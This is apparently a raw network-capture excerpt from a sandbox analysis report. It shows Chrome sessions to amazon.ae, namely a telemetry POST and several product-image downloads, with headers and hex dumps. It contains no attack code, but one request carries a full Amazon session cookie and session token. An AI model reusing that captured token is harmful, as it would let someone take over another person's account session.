                                                                                                                                                                                                                                                                Data Ascii: Rj.tHjH`>pWQ'XuO0[Z.b5{KAt>|lu4\XC-xG1QNTY\Aa5&3uoCF"FpvN1[KIizG$(TDF0I+YIuWPcxtUQcbt|abH'/5DT0&EE!=w5kM
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC488INData Raw: 15 97 ac 58 3d d9 4d d1 35 a9 3f 1b 82 92 3c a3 81 b3 70 67 c6 3b e4 83 8f 4a f5 c0 18 03 80 2b 51 5e 48 e4 9f e2 29 4a 56 c8 8a 52 94 02 94 a5 00 a5 29 40 29 4a 50 0a 82 fb 4f b1 f7 de 9b d5 d3 f7 22 49 3f d0 75 90 d4 ea b1 6f ec d2 fa da e6 d6 5f 82 78 a4 46 fc 24 52 86 ba 9d 34 c1 47 e8 b3 19 fd 9d 14 f9 5a ea 7f 9a 5d a4 a2 b9 ed 59 89 03 27 1f 22 c4 8f a7 18 3f f1 f9 d7 5c e8 fd 07 2e 99 d3 f7 7a 11 ba 12 99 62 bc 54 97 c2 31 aa 9b 9f 09 86 57 73 9c 2b a1 aa e1 7d 87 de 82 3f c6 c1 fe 47 ff 00 ad 57 1c d2 72 b7 e6 ca 4a 69 d1 45 5e 86 68 8a 27 2c e4 01 f8 9e 6b bf a2 b5 5b 38 e2 b7 41 85 85 11 07 e1 18 08 2a 85 b4 f6 23 2a 4f 6f 2c d7 f1 e2 19 a2 72 8b 0b 12 e1 18 31 19 2c b8 ae 80 76 de cc df 32 6b 99 26 9d 51 8b 3f 14 a5 2a 40 57 d0 9b ca 81 37 80
                                                                                                                                                                                                                                                                Data Ascii: X=M5?<pg;J+Q^H)JVR)@)JPO"I?uo_xF$R4GZ]Y'"?\.zbT1Ws+}?GWrJiE^h',k[8A*#*Oo,r1,v2k&Q?*@W7


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                78192.168.2.44993552.212.43.1354437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1104OUTPOST /1/batch/1/OE/ HTTP/1.1
                                                                                                                                                                                                                                                                Host: fls-eu.amazon.ae
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                Content-Length: 12875
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                Cookie: session-id=262-5692979-3003613; session-id-time=2082787201l; i18n-prefs=AED; ubid-acbae=261-1616972-1526733; session-token=u+Xu9IKk6z4bWSqe4Kvvln6p1zDqk1D7MnNB3tWScH7touYZc6sh6dHBcy2q2HhlEEXu80ZhJqEZM7k3rjxpO8gESSmSk1s6P1T+jKUCHdwhi4PKpFieH254fkL8Sx471FVO3uSkKyv0kMJuqkkEOmdxCmYS4Uu3M8HhXVFO8mGXjhRenzR1BGRPXv/dL6i02Av5x5UVUBkWBOjQsEM+LkEcipsOGdGjSyPfkOMzshISd9tYctqiC8wDGa2yLTvP1TSnUUd/BS2GJinV6ANw8B2KEiOU5rLMfVcFqNzDeQRe2A2vpRjUXoNG1EDbU2Uck7JLHPddRS6bAJSNyn0Zq9+V3fb/khVK
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC12875OUTData Raw: 7b 22 72 69 64 22 3a 22 43 33 37 53 46 45 59 30 47 44 58 45 5a 35 48 44 45 56 52 4e 22 2c 22 73 69 64 22 3a 22 32 36 32 2d 35 36 39 32 39 37 39 2d 33 30 30 33 36 31 33 22 2c 22 6d 69 64 22 3a 22 41 32 56 49 47 51 33 35 52 43 53 34 55 47 22 2c 22 73 6e 22 3a 22 77 77 77 2e 61 6d 61 7a 6f 6e 2e 61 65 22 2c 22 72 65 71 73 22 3a 5b 7b 22 63 73 6d 63 6f 75 6e 74 22 3a 7b 22 63 6f 75 6e 74 65 72 22 3a 22 62 61 73 65 6c 69 6e 65 43 6f 75 6e 74 65 72 32 22 2c 22 76 61 6c 75 65 22 3a 31 2c 22 74 22 3a 35 7d 7d 2c 7b 22 63 73 6d 63 6f 75 6e 74 22 3a 7b 22 63 6f 75 6e 74 65 72 22 3a 22 6e 65 78 75 73 42 61 73 65 6c 69 6e 65 43 6f 75 6e 74 65 72 22 2c 22 76 61 6c 75 65 22 3a 31 2c 22 74 22 3a 35 7d 7d 2c 7b 22 63 73 6d 63 6f 75 6e 74 22 3a 7b 22 63 6f 75 6e 74 65 72
                                                                                                                                                                                                                                                                Data Ascii: {"rid":"C37SFEY0GDXEZ5HDEVRN","sid":"262-5692979-3003613","mid":"A2VIGQ35RCS4UG","sn":"www.amazon.ae","reqs":[{"csmcount":{"counter":"baselineCounter2","value":1,"t":5}},{"csmcount":{"counter":"nexusBaselineCounter","value":1,"t":5}},{"csmcount":{"counter
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC288INHTTP/1.1 204 No Content
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:31 GMT
                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                x-amzn-RequestId: e2853f99-cd75-400a-9973-0c2c6a0ec6ca
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Access-Control-Expose-Headers: x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                79192.168.2.449936151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763856_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3650
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 8ddc0acc-6b0f-4e55-a8a4-2058b88461d0
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Mon, 02 May 2044 10:38:21 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 4164501
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:31 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200132-IAD, cache-ewr18171-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 9b 00 01 00 01 05 01 01 00 00 00 00 00 00 00 00 00 00 00 07 03 04 05 06 08 01 02 10 00 02 01 03 02 03 05 06 04 03 07 05 01 00 00 00 01 02 03 00 04 11 12 21 05 31 41 06 13 51 61 71 07 22 32 81 91 a1 14 23 42 b1 15 a2 b2 08 24 52 53 62 c1
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1AQaq"2#B$RSb
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: 79 aa e4 92 7c c9 f4 c5 6c c7 3e 26 be 24 85 66 42 8f 9c 1c 72 66 43 b1 cf c4 a5 58 7d 77 ab 88 14 2b 20 e8 08 af 91 ae 30 5a 89 dc ad 94 de e4 f6 c8 cb 8b f1 4b 91 79 70 b6 a2 3d 10 6d a1 94 fe 63 0d 9c ea 18 d3 be 54 7a 66 b2 96 77 69 79 12 4c 9b 06 ce 54 f3 56 1b 32 9f 4f b8 c1 ad 1e c7 89 ac cf 36 bf 8b bd 94 30 ea 18 31 0d f7 ac c7 67 65 fc eb b8 ff 00 4b 69 61 ea a7 43 7d 88 fa 54 34 66 49 db c9 2e cc 9f 2b 87 41 51 cf 05 a6 b4 6d 34 a5 2a f1 94 29 4a 50 0a 52 94 02 94 a5 00 a5 29 40 2b c6 60 80 b3 1c 2a 82 49 f0 03 73 5e d5 b5 ed b3 5c c4 f1 2b 05 d4 37 27 96 06 e7 7e 95 c5 96 4a 15 ca 50 5b 7d d1 d4 22 a5 24 9b d2 35 fb 49 1a 69 e4 b9 71 bc 8c 02 a9 fd 2a 15 5d 47 d3 ea 58 d6 5a c9 81 8b 42 9f fa 4c 57 e4 87 4a fd 85 60 f8 0f 1e e1 dc 62 35 6b 69
                                                                                                                                                                                                                                                                Data Ascii: y|l>&$fBrfCX}w+ 0ZKyp=mcTzfwiyLTV2O601geKiaC}T4fI.+AQm4*)JPR)@+`*Is^\+7'~JP[}"$5Iiq*]GXZBLWJ`b5ki
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC894INData Raw: f1 04 15 3e 98 f7 b1 e5 51 3f 65 66 86 3b c4 12 cb 14 79 b5 60 ab 33 05 59 0b 3a 12 a3 24 67 65 e9 ca a5 48 61 ee 72 e8 23 41 d4 89 f2 9f 43 91 fb 57 b4 c5 5f 29 19 f9 6f e7 32 bc 6e ac 0e 92 4f 89 c6 9f ff 00 0a af b9 f8 6b 03 7f da 6e 17 60 01 bc e2 36 b1 78 07 b9 4c 9f fc 53 39 3f 73 5a 37 14 f6 cb d9 fb 25 6e ed a7 bb 3e 11 c4 51 7e 6f 2f 74 b8 f4 0d 56 54 5b ec 56 d9 57 b7 44 49 79 63 6e 0e 56 34 66 6f 36 76 eb e7 b6 6a d3 b2 d6 9a e4 ba bc 6f 1e ed 3e 58 67 fb e0 7c 8d 61 e0 e2 31 f6 85 ff 00 16 98 8d ae 84 65 22 ce a5 19 50 80 67 0b e1 86 d8 7c 35 22 5a db 25 ac 51 c2 9f 0c 6a 00 f3 ea 49 f3 63 92 7c cd 57 aa be 7b e5 37 d9 79 16 32 6f 55 63 42 a5 dd f9 b2 b5 29 4a ba 65 8a 52 94 02 94 a5 00 a5 29 40 29 4a 50 0a 8c 3d a5 c2 c0 f0 7b 90 36 8e 69 94
                                                                                                                                                                                                                                                                Data Ascii: >Q?ef;y`3Y:$geHar#ACW_)o2nOkn`6xLS9?sZ7%n>Q~o/tVT[VWDIycnV4fo6vjo>Xg|a1e"Pg|5"Z%QjIc|W{7y2oUcB)JeR)@)JP={6i


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                80192.168.2.449938151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763815_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2163
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 4841404d-ff63-47b3-8889-e42f6e4119d6
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Sat, 16 Jul 2044 20:00:03 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1209250
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:31 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kiad7000173-IAD, cache-ewr18152-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 88 00 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 06 07 04 05 08 01 03 02 10 00 02 02 01 02 03 04 08 03 06 07 01 00 00 00 00 01 02 00 03 04 05 11 06 12 21 07 13 31 61 22 32 41 51 52 71 81 91 14 23 a1 33 34 42 a2 b2 c2 15 43 72 83
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1a"2AQRq#34BCr
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC785INData Raw: de 24 99 a8 4b 76 9c 7f 63 72 ba fe 3c 5f cf 4b 6b 44 ed 07 33 53 bd 71 ae cc c2 c4 b5 ce c9 55 d8 77 12 de 5c e3 2f 93 7f b0 79 39 b7 88 5f 4b 45 b7 51 7a 2c a0 b0 53 99 8c c4 0a d9 bc 05 b8 ec f6 38 53 f1 a5 96 ed e2 ca 00 26 54 5c 0b a5 e3 67 e7 9c fb b9 b9 b4 ee e5 eb e5 20 02 ce cc aa 1c 90 4e c0 fb 88 26 58 1d a6 70 dd 39 98 5f e2 0a 15 2d d3 cb 3e fd d8 26 d5 3b 21 52 7c 8e ce 0f 5f 09 4c f3 6a e6 d9 fa 79 ae 3e 3f 69 2b 22 ee d4 b4 1a d8 aa dd 6d be 75 e2 da 53 e8 cc a8 0c 27 6a 5a 13 7a d6 dc 9e 6d 8b 67 f6 86 9c b9 4b 59 8b 90 11 15 9a 8b 49 3e 74 b7 b7 a9 fe 12 7a ff 00 d7 5d f7 90 d4 fb 4c fd dd 3c fa b8 74 d6 2f 1c 68 79 7f b3 d4 29 1e 4e 4d 1f fa 04 92 8a 19 72 17 9e 96 16 2f c4 8c 1c 7d c1 22 72 25 ec a4 77 80 02 c9 d4 79 ed d7 94 ed b1 2a
                                                                                                                                                                                                                                                                Data Ascii: $Kvcr<_KkD3SqUw\/y9_KEQz,S8S&T\g N&Xp9_->&;!R|_Ljy>?i+"muS'jZzmgKYI>tz]L<t/hy)NMr/}"r%wy*


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                81192.168.2.449940151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:31 UTC691OUTGET /images/G/39/UAE-hq/2024/img/Apparel/XCM_CUTTLE_1717076_3763818_372x232_2X_en_AE._SY116_CB558609315_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 2862
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 722c6295-0f4d-4b4d-92c8-1d2114305dfb
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 07 May 2024 08:31:11 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Mon, 02 May 2044 10:38:22 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: MISS
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 938686
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:32 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kcgs7200168-IAD, cache-nyc-kteb1890070-NYC
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 05 05 05 09 06 09 09 09 09 0c 13 0e 0e 0c 0e 0e 19 12 0e 12 10 17 0e 10 10 17 10 17 17 10 14 17 14 14 1a 17 13 13 17 1a 14 17 18 23 18 1c 19 1f 1a 18 21 18 23 18 23 22 22 24 27 28 23 17 27 35 01 09 09 05 09 09 09 0c 09 09 13 21 17 0e 1a 22 1c 0c 18 29 22 28 1a 22 24 22 22 19 2c 22 28 21 22 14 23 22 1a 1f 1f 1a 1a 1c 18 1c 22 1a 24 24 23 0e 19 24 21 17 2f 19 1a 17 22 21 27 1f 17 24 2a ff c0 00 11 08 00 74 00 ba 03 01 22 00 02 11 01 03 11 01 ff c4 00 8a 00 01 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 05 02 04 06 07 08 01 03 09 10 00 02 01 03 02 04 03 06 04 05 03 05 00 00 00 00 01 02 00 03 04 11 05 21 06 12 31 41 13 22 51 07 32 71 81 91 a1 14 23 61 92 15 25 42 52 c1 33 43 63 72
                                                                                                                                                                                                                                                                Data Ascii: JFIF#!##""$'(#'5!")"("$"","(!"#""$$#$!/"!'$*t"!1A"Q2q#a%BR3Ccr
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC1378INData Raw: e3 8e ac d5 ba 51 fe ca 5b 82 ad 55 88 82 a5 ec a7 4c ad 75 5a ff 00 54 2f a8 5c d6 20 bd 4a de 5a 5e 80 25 05 f2 04 5e 8a 8c 6a 72 89 9d de 6b 94 2d c9 04 f3 37 a7 53 f3 ef 21 1f 88 6b d4 3e 44 c0 f9 0f f0 d2 bd 53 73 91 92 58 e9 74 2c a9 8a 34 28 a5 24 1f d0 88 29 a7 ed 50 16 53 7d 59 18 04 53 92 0f 6e 82 43 52 ae f5 c7 e6 12 7e 66 42 eb dc 53 65 a1 23 78 b5 10 d6 03 cb 6f ce 39 c9 ed cc 3a a2 f7 2c 71 b4 ef 1c 77 59 e5 b7 db f1 c5 80 71 ef 18 57 06 e7 4e b4 a4 c1 29 b0 5a b7 03 3e 72 37 6a 6a 07 45 07 de 62 7c d8 2b 2e 3d 9a f1 2d bd d1 ad 65 56 bd 56 b9 72 4a 25 4d e8 f2 53 cf fa 3b 9f 31 04 b3 e4 29 3d b6 59 af 75 5d 5a 9d e8 7f 0e db 17 05 d8 93 e2 17 a8 ec db ec be 51 e6 27 98 b3 0c 0e aa 14 02 4d bf 09 5a d7 d0 f5 ad 3a ee f6 99 5a 2a 58 35 55 22
                                                                                                                                                                                                                                                                Data Ascii: Q[ULuZT/\ JZ^%^jrk-7S!k>DSsXt,4($)PS}YSnCR~fBSe#xo9:,qwYqWN)Z>r7jjEb|+.=-eVVrJ%MS;1)=Yu]ZQ'MZ:Z*X5U"
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC106INData Raw: 00 d5 9b 58 d2 e0 ea 55 0e 6e 1a ad c1 ff 00 9a ab 54 5f d9 90 9f 69 91 db 68 69 44 05 45 08 07 65 01 44 cb 85 00 27 d4 20 12 a6 12 26 ee ca fd b1 b5 d2 87 79 3d 6d 47 c3 18 9f 7e 51 2a 9d e1 17 2e 48 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 80 88 88 08 88 81 ff d9
                                                                                                                                                                                                                                                                Data Ascii: XUnT_ihiDEeD' &y=mG~Q*.H


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                82192.168.2.449942151.101.65.164437408C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC704OUTGET /images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332322_186x116_1X_en_AE._SY116_CB597933578_.jpg HTTP/1.1
                                                                                                                                                                                                                                                                Host: images-eu.ssl-images-amazon.com
                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                2024-08-12 13:23:32 UTC651INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                Content-Length: 3859
                                                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                                                X-Amz-IR-Id: 1666ae24-375d-4b4b-99ae-d45c4c07a5ad
                                                                                                                                                                                                                                                                Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                Last-Modified: Tue, 08 Aug 2023 07:14:49 GMT
                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                Expires: Thu, 02 Jun 2044 08:08:31 GMT
                                                                                                                                                                                                                                                                X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                Age: 1407603
                                                                                                                                                                                                                                                                Date: Mon, 12 Aug 2024 13:23:32 GMT
                                                                                                                                                                                                                                                                X-Served-By: cache-iad-kjyo7100130-IAD, cache-ewr18148-EWR
                                                                                                                                                                                                                                                                Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
